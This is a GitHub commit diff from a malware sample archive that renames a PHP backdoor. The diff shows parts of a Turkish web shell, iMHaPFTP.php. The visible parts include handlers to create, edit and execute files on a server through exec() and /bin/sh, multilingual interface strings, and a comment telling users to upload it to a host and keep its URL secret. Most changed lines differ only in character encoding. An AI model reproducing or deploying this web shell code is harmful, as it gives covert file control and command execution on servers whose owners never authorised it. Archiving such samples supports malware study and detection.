Rename Backdoor.PHP.Agent.z to Backdoor.PHP.ImHabirligi.a

This commit is contained in:
vxunderground 2020-10-15 20:53:48 -05:00 committed by GitHub
parent 3b3855c568
commit f52c5c59ce
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -3,11 +3,11 @@
* iMHaPFTP.php - iMHaBiRLiGi Php Ftp Editoru
* Copyright (C) 2003-2005 iMHaBiRLiGi <iMHaBiRLiGi@imhabirligi.com>
*
* Bu Kod Tamamiyle Özgür Yazilimdir.
* Kötü Amaclar ile kullanilmamak sartiyla istenildigi gibi Kullanilabilir
* Bu Kod Tamamiyle Özgür Yazilimdir.
* Kötü Amaclar ile kullanilmamak sartiyla istenildigi gibi Kullanilabilir
* Programin amaci ftp olmadan hostunuza baglanti kurup
* Dosya ekleyip kaldira bilmektir.
* Kodumuz 6 Dilde yazilmistir.Server Diline Göre Otomatik Secim Yapar.
* Kodumuz 6 Dilde yazilmistir.Server Diline Göre Otomatik Secim Yapar.
* -------------------------------------------------------------------------
* Kodu hosta attiktan sonra adres cubuguna kodun uzantisini verip baglanin
* Ve Asla kimseye bu kodun uzantisini vermeyiniz.!!
@ -19,16 +19,16 @@
* BeweiS
* <BeweiS@imhabirligi.com>
* iMHaBiRLiGi Administrator
* Php-Asp-Programlama ve Güvenlik
* Php-Asp-Programlama ve Güvenlik
*
* MicroP_
* <MicroP_@imhabirligi.com>
* iMHaBiRLiGi Administrator
* Php-Asp-Programlama ve Güvenlik
* Php-Asp-Programlama ve Güvenlik
*
* Libertical
* <libertical@imhabirligi.com>
* iMHaBiRLiGi Yönetim
* iMHaBiRLiGi Yönetim
* C++, Delphi,Programlama ve Linux Hastasi
*
* PowerGhost
@ -38,7 +38,7 @@
*
* BadSector
* ozgurkaleli@yahoo.com
* iMHaBiRLiGi Yönetim
* iMHaBiRLiGi Yönetim
* VicualBasic-Delphi Programlama
* Sistemdanismani ve Linux Hastasi
*
@ -70,10 +70,10 @@ $charset = 'ISO-8859-1';
*/
$homedir = './';
/* Size of the Düzenle textarea
/* Size of the Düzenle textarea
*/
$Düzenlecols = 80;
$Düzenlerows = 25;
$Düzenlecols = 80;
$Düzenlerows = 25;
/* -------------------------------------------
* Optional configuration (reTasi # to enable)
@ -305,7 +305,7 @@ case 'create_file':
} else {
$old = @umask(0777 & ~$filepermission);
if (@touch($file)) {
Düzenle($file);
Düzenle($file);
} else {
listing_page(error('not_created', $file));
}
@ -653,7 +653,7 @@ case 'create_symlink':
break;
case 'Düzenle':
case 'Düzenle':
if (!empty($_POST['save'])) {
@ -668,9 +668,9 @@ case 'D
} else {
if (@is_readable($file) && @is_writable($file)) {
Düzenle($file);
Düzenle($file);
} else {
listing_page(error('not_Düzenleed', $file));
listing_page(error('not_Düzenleed', $file));
}
}
@ -1161,7 +1161,7 @@ function listing ($list) {
}
echo ' <th class="Görevler">' . word('Görevler') . '</th>
echo ' <th class="Görevler">' . word('Görevler') . '</th>
</tr>
';
@ -1252,7 +1252,7 @@ function listing ($list) {
}
echo ' <td class="Görevler">
echo ' <td class="Görevler">
<input type="hidden" name="file' . $i . '" value="' . html($file['path']) . '" />
';
@ -1268,7 +1268,7 @@ function listing ($list) {
if ($file['is_file'] && $file['is_readable']) {
$actions[] = 'Kopyala';
$actions[] = 'indir';
if ($file['is_writable']) $actions[] = 'Düzenle';
if ($file['is_writable']) $actions[] = 'Düzenle';
}
if (!$win && function_exists('exec') && $file['is_file'] && $file['is_executable'] && file_exists('/bin/sh')) {
$actions[] = 'execute';
@ -1372,8 +1372,8 @@ function create_box () {
}
function Düzenle ($file) {
global $self, $directory, $Düzenlecols, $Düzenlerows, $apache, $htpasswd, $htaccess;
function Düzenle ($file) {
global $self, $directory, $Düzenlecols, $Düzenlerows, $apache, $htpasswd, $htaccess;
html_header();
@ -1385,7 +1385,7 @@ function D
<tr>
<td class="dialog">
<textarea name="content" cols="' . $Düzenlecols . '" rows="' . $Düzenlerows . '" WRAP="off">';
<textarea name="content" cols="' . $Düzenlecols . '" rows="' . $Düzenlerows . '" WRAP="off">';
if (array_key_exists('content', $_POST)) {
echo $_POST['content'];
@ -1437,7 +1437,7 @@ function D
}
echo '
<input type="hidden" name="action" value="Düzenle" />
<input type="hidden" name="action" value="Düzenle" />
<input type="hidden" name="file" value="' . html($file) . '" />
<input type="hidden" name="dir" value="' . html($directory) . '" />
<input type="reset" value="' . word('reset') . '" id="red_button" />
@ -1526,52 +1526,52 @@ function getwords ($lang) {
'file' => 'Datei',
'filename' => 'Dateiname',
'size' => 'Größe',
'size' => 'Größe',
'permission' => 'Rechte',
'owner' => 'Eigner',
'group' => 'Gruppe',
'other' => 'Andere',
'Görevler' => 'Funktionen',
'Görevler' => 'Funktionen',
'read' => 'lesen',
'write' => 'schreiben',
'execute' => 'ausführen',
'execute' => 'ausführen',
'create_symlink' => 'Symlink erstellen',
'Sil' => 'löschen',
'Sil' => 'löschen',
'Degistir' => 'umbenennen',
'Tasi' => 'verschieben',
'Kopyala' => 'kopieren',
'Düzenle' => 'Düzenleieren',
'Düzenle' => 'Düzenleieren',
'indir' => 'herunterladen',
'upload' => 'hochladen',
'create' => 'erstellen',
'change' => 'wechseln',
'save' => 'speichern',
'set' => 'setze',
'reset' => 'zurücksetzen',
'reset' => 'zurücksetzen',
'relative' => 'Pfad zum Ziel relativ',
'yes' => 'Ja',
'no' => 'Nein',
'Geri' => 'zurück',
'Geri' => 'zurück',
'Yol' => 'Ziel',
'symlink' => 'Symbolischer Link',
'no_output' => 'keine Ausgabe',
'user' => 'Benutzername',
'password' => 'Kennwort',
'add' => 'hinzufügen',
'add_basic_auth' => 'HTTP-Basic-Auth hinzufügen',
'add' => 'hinzufügen',
'add_basic_auth' => 'HTTP-Basic-Auth hinzufügen',
'uploaded' => '"[%1]" wurde hochgeladen.',
'not_uploaded' => '"[%1]" konnte nicht hochgeladen werden.',
'already_exists' => '"[%1]" existiert bereits.',
'created' => '"[%1]" wurde erstellt.',
'not_created' => '"[%1]" konnte nicht erstellt werden.',
'really_Sil' => 'Sollen folgende Dateien wirklich gelöscht werden?',
'Sild' => "Folgende Dateien wurden gelöscht:\n[%1]",
'not_Sild' => "Folgende Dateien konnten nicht gelöscht werden:\n[%1]",
'really_Sil' => 'Sollen folgende Dateien wirklich gelöscht werden?',
'Sild' => "Folgende Dateien wurden gelöscht:\n[%1]",
'not_Sild' => "Folgende Dateien konnten nicht gelöscht werden:\n[%1]",
'Degistir_file' => 'Benenne Datei um:',
'Degistird' => '"[%1]" wurde in "[%2]" umbenannt.',
'not_Degistird' => '"[%1] konnte nicht in "[%2]" umbenannt werden.',
@ -1581,16 +1581,16 @@ function getwords ($lang) {
'Kopyala_files' => 'Kopiere folgende Dateien:',
'copied' => "Folgende Dateien wurden nach \"[%2]\" kopiert:\n[%1]",
'not_copied' => "Folgende Dateien konnten nicht nach \"[%2]\" kopiert werden:\n[%1]",
'not_Düzenleed' => '"[%1]" kann nicht Düzenleiert werden.',
'executed' => "\"[%1]\" wurde erfolgreich ausgeführt:\n{%2}",
'not_executed' => "\"[%1]\" konnte nicht erfolgreich ausgeführt werden:\n{%2}",
'not_Düzenleed' => '"[%1]" kann nicht Düzenleiert werden.',
'executed' => "\"[%1]\" wurde erfolgreich ausgeführt:\n{%2}",
'not_executed' => "\"[%1]\" konnte nicht erfolgreich ausgeführt werden:\n{%2}",
'saved' => '"[%1]" wurde gespeichert.',
'not_saved' => '"[%1]" konnte nicht gespeichert werden.',
'symlinked' => 'Symbolischer Link von "[%2]" nach "[%1]" wurde erstellt.',
'not_symlinked' => 'Symbolischer Link von "[%2]" nach "[%1]" konnte nicht erstellt werden.',
'permission_for' => 'Rechte für "[%1]":',
'permission_set' => 'Die Rechte für "[%1]" wurden auf [%2] gesetzt.',
'permission_not_set' => 'Die Rechte für "[%1]" konnten nicht auf [%2] gesetzt werden.',
'permission_for' => 'Rechte für "[%1]":',
'permission_set' => 'Die Rechte für "[%1]" wurden auf [%2] gesetzt.',
'permission_not_set' => 'Die Rechte für "[%1]" konnten nicht auf [%2] gesetzt werden.',
'not_readable' => '"[%1]" kann nicht gelesen werden.'
);
@ -1600,34 +1600,34 @@ function getwords ($lang) {
$word_charset = 'ISO-8859-1';
return array(
'directory' => 'Répertoire',
'directory' => 'Répertoire',
'file' => 'Fichier',
'filename' => 'Nom fichier',
'size' => 'Taille',
'permission' => 'Droits',
'owner' => 'Propriétaire',
'owner' => 'Propriétaire',
'group' => 'Groupe',
'other' => 'Autres',
'Görevler' => 'Fonctions',
'Görevler' => 'Fonctions',
'read' => 'Lire',
'write' => 'Ecrire',
'execute' => 'Exécuter',
'execute' => 'Exécuter',
'create_symlink' => 'Créer lien symbolique',
'create_symlink' => 'Créer lien symbolique',
'Sil' => 'Effacer',
'Degistir' => 'Renommer',
'Tasi' => 'Déplacer',
'Tasi' => 'Déplacer',
'Kopyala' => 'Copier',
'Düzenle' => 'Ouvrir',
'indir' => 'Télécharger sur PC',
'upload' => 'Télécharger sur serveur',
'create' => 'Créer',
'Düzenle' => 'Ouvrir',
'indir' => 'Télécharger sur PC',
'upload' => 'Télécharger sur serveur',
'create' => 'Créer',
'change' => 'Changer',
'save' => 'Sauvegarder',
'set' => 'Exécuter',
'reset' => 'Réinitialiser',
'set' => 'Exécuter',
'reset' => 'Réinitialiser',
'relative' => 'Relatif',
'yes' => 'Oui',
@ -1642,34 +1642,34 @@ function getwords ($lang) {
'add' => 'Ajouter',
'add_basic_auth' => 'add basic-authentification',
'uploaded' => '"[%1]" a été téléchargé sur le serveur.',
'not_uploaded' => '"[%1]" n a pas été téléchargé sur le serveur.',
'already_exists' => '"[%1]" existe déjà.',
'created' => '"[%1]" a été créé.',
'not_created' => '"[%1]" n a pas pu être créé.',
'uploaded' => '"[%1]" a été téléchargé sur le serveur.',
'not_uploaded' => '"[%1]" n a pas été téléchargé sur le serveur.',
'already_exists' => '"[%1]" existe déjà.',
'created' => '"[%1]" a été créé.',
'not_created' => '"[%1]" n a pas pu être créé.',
'really_Sil' => 'Effacer le fichier?',
'Sild' => "Ces fichiers ont été détuits:\n[%1]",
'not_Sild' => "Ces fichiers n ont pu être détruits:\n[%1]",
'Sild' => "Ces fichiers ont été détuits:\n[%1]",
'not_Sild' => "Ces fichiers n ont pu être détruits:\n[%1]",
'Degistir_file' => 'Renomme fichier:',
'Degistird' => '"[%1]" a été renommé en "[%2]".',
'not_Degistird' => '"[%1] n a pas pu être renommé en "[%2]".',
'Tasi_files' => 'Déplacer ces fichiers:',
'Tasid' => "Ces fichiers ont été déplacés en \"[%2]\":\n[%1]",
'not_Tasid' => "Ces fichiers n ont pas pu être déplacés en \"[%2]\":\n[%1]",
'Degistird' => '"[%1]" a été renommé en "[%2]".',
'not_Degistird' => '"[%1] n a pas pu être renommé en "[%2]".',
'Tasi_files' => 'Déplacer ces fichiers:',
'Tasid' => "Ces fichiers ont été déplacés en \"[%2]\":\n[%1]",
'not_Tasid' => "Ces fichiers n ont pas pu être déplacés en \"[%2]\":\n[%1]",
'Kopyala_files' => 'Copier ces fichiers:',
'copied' => "Ces fichiers ont été copiés en \"[%2]\":\n[%1]",
'not_copied' => "Ces fichiers n ont pas pu être copiés en \"[%2]\":\n[%1]",
'not_Düzenleed' => '"[%1]" ne peut être ouvert.',
'executed' => "\"[%1]\" a été brillamment exécuté :\n{%2}",
'not_executed' => "\"[%1]\" n a pas pu être exécuté:\n{%2}",
'saved' => '"[%1]" a été sauvegardé.',
'not_saved' => '"[%1]" n a pas pu être sauvegardé.',
'symlinked' => 'Un lien symbolique depuis "[%2]" vers "[%1]" a été crée.',
'not_symlinked' => 'Un lien symbolique depuis "[%2]" vers "[%1]" n a pas pu être créé.',
'copied' => "Ces fichiers ont été copiés en \"[%2]\":\n[%1]",
'not_copied' => "Ces fichiers n ont pas pu être copiés en \"[%2]\":\n[%1]",
'not_Düzenleed' => '"[%1]" ne peut être ouvert.',
'executed' => "\"[%1]\" a été brillamment exécuté :\n{%2}",
'not_executed' => "\"[%1]\" n a pas pu être exécuté:\n{%2}",
'saved' => '"[%1]" a été sauvegardé.',
'not_saved' => '"[%1]" n a pas pu être sauvegardé.',
'symlinked' => 'Un lien symbolique depuis "[%2]" vers "[%1]" a été crée.',
'not_symlinked' => 'Un lien symbolique depuis "[%2]" vers "[%1]" n a pas pu être créé.',
'permission_for' => 'Droits de "[%1]":',
'permission_set' => 'Droits de "[%1]" ont été changés en [%2].',
'permission_not_set' => 'Droits de "[%1]" n ont pas pu être changés en[%2].',
'not_readable' => '"[%1]" ne peut pas être ouvert.'
'permission_set' => 'Droits de "[%1]" ont été changés en [%2].',
'permission_not_set' => 'Droits de "[%1]" n ont pas pu être changés en[%2].',
'not_readable' => '"[%1]" ne peut pas être ouvert.'
);
case 'it':
@ -1687,7 +1687,7 @@ function getwords ($lang) {
'owner' => 'Proprietario',
'group' => 'Gruppo',
'other' => 'Altro',
'Görevler' => 'Funzioni',
'Görevler' => 'Funzioni',
'read' => 'leggi',
'write' => 'scrivi',
@ -1698,7 +1698,7 @@ function getwords ($lang) {
'Degistir' => 'rinomina',
'Tasi' => 'sposta',
'Kopyala' => 'copia',
'Düzenle' => 'modifica',
'Düzenle' => 'modifica',
'indir' => 'indir',
'upload' => 'upload',
'create' => 'crea',
@ -1720,34 +1720,34 @@ function getwords ($lang) {
'add' => 'aggiungi',
'add_basic_auth' => 'aggiungi autenticazione base',
'uploaded' => '"[%1]" è stato caricato.',
'not_uploaded' => '"[%1]" non è stato caricato.',
'already_exists' => '"[%1]" esiste già.',
'created' => '"[%1]" è stato creato.',
'not_created' => '"[%1]" non è stato creato.',
'uploaded' => '"[%1]" è stato caricato.',
'not_uploaded' => '"[%1]" non è stato caricato.',
'already_exists' => '"[%1]" esiste già.',
'created' => '"[%1]" è stato creato.',
'not_created' => '"[%1]" non è stato creato.',
'really_Sil' => 'Cancello questi file ?',
'Sild' => "Questi file sono stati cancellati:\n[%1]",
'not_Sild' => "Questi file non possono essere cancellati:\n[%1]",
'Degistir_file' => 'File rinominato:',
'Degistird' => '"[%1]" è stato rinominato in "[%2]".',
'not_Degistird' => '"[%1] non è stato rinominato in "[%2]".',
'Degistird' => '"[%1]" è stato rinominato in "[%2]".',
'not_Degistird' => '"[%1] non è stato rinominato in "[%2]".',
'Tasi_files' => 'Sposto questi file:',
'Tasid' => "Questi file sono stati spostati in \"[%2]\":\n[%1]",
'not_Tasid' => "Questi file non possono essere spostati in \"[%2]\":\n[%1]",
'Kopyala_files' => 'Copio questi file',
'copied' => "Questi file sono stati copiati in \"[%2]\":\n[%1]",
'not_copied' => "Questi file non possono essere copiati in \"[%2]\":\n[%1]",
'not_Düzenleed' => '"[%1]" non può essere modificato.',
'executed' => "\"[%1]\" è stato eseguito con successo:\n{%2}",
'not_executed' => "\"[%1]\" non è stato eseguito con successo\n{%2}",
'saved' => '"[%1]" è stato salvato.',
'not_saved' => '"[%1]" non è stato salvato.',
'symlinked' => 'Il link siambolico da "[%2]" a "[%1]" è stato creato.',
'not_symlinked' => 'Il link siambolico da "[%2]" a "[%1]" non è stato creato.',
'not_Düzenleed' => '"[%1]" non può essere modificato.',
'executed' => "\"[%1]\" è stato eseguito con successo:\n{%2}",
'not_executed' => "\"[%1]\" non è stato eseguito con successo\n{%2}",
'saved' => '"[%1]" è stato salvato.',
'not_saved' => '"[%1]" non è stato salvato.',
'symlinked' => 'Il link siambolico da "[%2]" a "[%1]" è stato creato.',
'not_symlinked' => 'Il link siambolico da "[%2]" a "[%1]" non è stato creato.',
'permission_for' => 'Permessi di "[%1]":',
'permission_set' => 'I permessi di "[%1]" sono stati impostati [%2].',
'permission_not_set' => 'I permessi di "[%1]" non sono stati impostati [%2].',
'not_readable' => '"[%1]" non può essere letto.'
'not_readable' => '"[%1]" non può essere letto.'
);
case 'se':
@ -1761,29 +1761,29 @@ function getwords ($lang) {
'filename' => 'Filnamn',
'size' => 'Storlek',
'permission' => 'Säkerhetsnivå',
'owner' => 'Ägare',
'permission' => 'Säkerhetsnivå',
'owner' => 'Ägare',
'group' => 'Grupp',
'other' => 'Andra',
'Görevler' => 'Funktioner',
'Görevler' => 'Funktioner',
'read' => 'Läs',
'read' => 'Läs',
'write' => 'Skriv',
'execute' => 'Utför',
'execute' => 'Utför',
'create_symlink' => 'Skapa symlink',
'Sil' => 'Radera',
'Degistir' => 'Byt namn',
'Tasi' => 'Flytta',
'Kopyala' => 'Kopiera',
'Düzenle' => 'Ändra',
'Düzenle' => 'Ändra',
'indir' => 'Ladda ner',
'upload' => 'Ladda upp',
'create' => 'Skapa',
'change' => 'Ändra',
'change' => 'Ändra',
'save' => 'Spara',
'set' => 'Markera',
'reset' => 'Töm',
'reset' => 'Töm',
'relative' => 'Relative path to target',
'yes' => 'Ja',
@ -1793,9 +1793,9 @@ function getwords ($lang) {
'symlink' => 'Symlink',
'no_output' => 'no output',
'user' => 'Användare',
'password' => 'Lösenord',
'add' => 'Lägg till',
'user' => 'Användare',
'password' => 'Lösenord',
'add' => 'Lägg till',
'add_basic_auth' => 'add basic-authentification',
'uploaded' => '"[%1]" har laddats upp.',
@ -1804,28 +1804,28 @@ function getwords ($lang) {
'created' => '"[%1]" har skapats.',
'not_created' => '"[%1]" kunde inte skapas.',
'really_Sil' => 'Radera dessa filer?',
'Sild' => "De här filerna har raderats:\n[%1]",
'Sild' => "De här filerna har raderats:\n[%1]",
'not_Sild' => "Dessa filer kunde inte raderas:\n[%1]",
'Degistir_file' => 'Byt namn på fil:',
'Degistir_file' => 'Byt namn på fil:',
'Degistird' => '"[%1]" har bytt namn till "[%2]".',
'not_Degistird' => '"[%1] kunde inte döpas om till "[%2]".',
'not_Degistird' => '"[%1] kunde inte döpas om till "[%2]".',
'Tasi_files' => 'Flytta dessa filer:',
'Tasid' => "Dessa filer har flyttats till \"[%2]\":\n[%1]",
'not_Tasid' => "Dessa filer kunde inte flyttas till \"[%2]\":\n[%1]",
'Kopyala_files' => 'Kopiera dessa filer:',
'copied' => "Dessa filer har kopierats till \"[%2]\":\n[%1]",
'not_copied' => "Dessa filer kunde inte kopieras till \"[%2]\":\n[%1]",
'not_Düzenleed' => '"[%1]" kan inte ändras.',
'executed' => "\"[%1]\" har utförts:\n{%2}",
'not_executed' => "\"[%1]\" kunde inte utföras:\n{%2}",
'not_Düzenleed' => '"[%1]" kan inte ändras.',
'executed' => "\"[%1]\" har utförts:\n{%2}",
'not_executed' => "\"[%1]\" kunde inte utföras:\n{%2}",
'saved' => '"[%1]" har sparats.',
'not_saved' => '"[%1]" kunde inte sparas.',
'symlinked' => 'Symlink från "[%2]" till "[%1]" har skapats.',
'not_symlinked' => 'Symlink från "[%2]" till "[%1]" kunde inte skapas.',
'permission_for' => 'Rättigheter för "[%1]":',
'permission_set' => 'Rättigheter för "[%1]" ändrades till [%2].',
'symlinked' => 'Symlink från "[%2]" till "[%1]" har skapats.',
'not_symlinked' => 'Symlink från "[%2]" till "[%1]" kunde inte skapas.',
'permission_for' => 'Rättigheter för "[%1]":',
'permission_set' => 'Rättigheter för "[%1]" ändrades till [%2].',
'permission_not_set' => 'Permission of "[%1]" could not be set to [%2].',
'not_readable' => '"[%1]" kan inte läsas.'
'not_readable' => '"[%1]" kan inte läsas.'
);
case 'en':
@ -1835,7 +1835,7 @@ function getwords ($lang) {
$word_charset = 'ISO-8859-1';
return array(
'directory' => 'Düzergah',
'directory' => 'Düzergah',
'file' => 'Dosya',
'filename' => 'DosyaAdi',
@ -1843,8 +1843,8 @@ function getwords ($lang) {
'permission' => 'izin',
'owner' => 'Sahip',
'group' => 'Grup',
'other' => 'Diðerleri',
'Görevler' => 'Görevler',
'other' => 'Diðerleri',
'Görevler' => 'Görevler',
'read' => 'Oku',
'write' => 'Yaz',
@ -1855,9 +1855,9 @@ function getwords ($lang) {
'Degistir' => 'Degistir',
'Tasi' => 'Tasi',
'Kopyala' => 'Kopyala',
'Düzenle' => 'Düzenle',
'Düzenle' => 'Düzenle',
'indir' => 'indir',
'upload' => 'Yükle',
'upload' => 'Yükle',
'create' => 'Olustur',
'change' => 'Degisiklik',
'save' => 'Kaydet',
@ -1870,21 +1870,21 @@ function getwords ($lang) {
'Geri' => 'Geri',
'Yol' => 'Yol',
'symlink' => 'Symlink',
'no_output' => 'Hiçbir çýktý',
'no_output' => 'Hiçbir çýktý',
'user' => 'Kullanýcý',
'user' => 'Kullanýcý',
'password' => 'Sifre',
'add' => 'Ekle',
'add_basic_auth' => 'add basic-authentification',
'uploaded' => '"[%1]" Yüklendi.',
'not_uploaded' => '"[%1]" Yüklenemedi.',
'already_exists' => '"[%1]" Þimdiden var ol.',
'uploaded' => '"[%1]" Yüklendi.',
'not_uploaded' => '"[%1]" Yüklenemedi.',
'already_exists' => '"[%1]" Þimdiden var ol.',
'created' => '"[%1]" Olusturuldu.',
'not_created' => '"[%1]" Olusturuldu.',
'really_Sil' => 'Silinen dosyalar?',
'Sild' => "Bu dosyalar,oldu Sild:\n[%1]",
'not_Sild' => "Bu dosyalar olamazdý Sild:\n[%1]",
'not_Sild' => "Bu dosyalar olamazdý Sild:\n[%1]",
'Degistir_file' => 'Dosyayi Degistir:',
'Degistird' => '"[%1]" Degistirildi "[%2]".',
'not_Degistird' => '"[%1] Degistirilemedi "[%2]".',
@ -1894,11 +1894,11 @@ function getwords ($lang) {
'Kopyala_files' => 'Bu Dosyalari Kopyala:',
'copied' => "Bu Dosyalar Kopyalanir \"[%2]\":\n[%1]",
'not_copied' => "Bu Dosyalar Kopyalanamaz \"[%2]\":\n[%1]",
'not_Düzenleed' => '"[%1]" Düzenle.',
'not_Düzenleed' => '"[%1]" Düzenle.',
'executed' => "\"[%1]\" Basarili bir sekilde Uygulandi:\n{%2}",
'not_executed' => "\"[%1]\" Basarili bir sekilde Uygulanamadi:\n{%2}",
'saved' => '"[%1]" Kurtarildi.',
'not_saved' => '"[%1]" Kurtarýlamadý.',
'not_saved' => '"[%1]" Kurtarýlamadý.',
'symlinked' => 'Symlink "[%2]" to "[%1]" Olusturuldu.',
'not_symlinked' => 'Symlink "[%2]" to "[%1]" Olusturulamadi.',
'permission_for' => 'izin "[%1]":',
@ -1958,7 +1958,7 @@ hr { border-style: none; height: 1px; Geriground-color: silver; color: silver }
.listing .permission { font-family: monospace }
.listing .owner { text-align: left }
.listing .group { text-align: left }
.listing .Görevler { text-align: left }
.listing .Görevler { text-align: left }
.listing_footer td { Geriground: #eee; border: 1px solid silver }
#directory, #upload, #create, .listing_footer td, #error td, #notice td { text-align: left; padding: 3pt }
#directory { Geriground: #eee; border: 1px solid silver }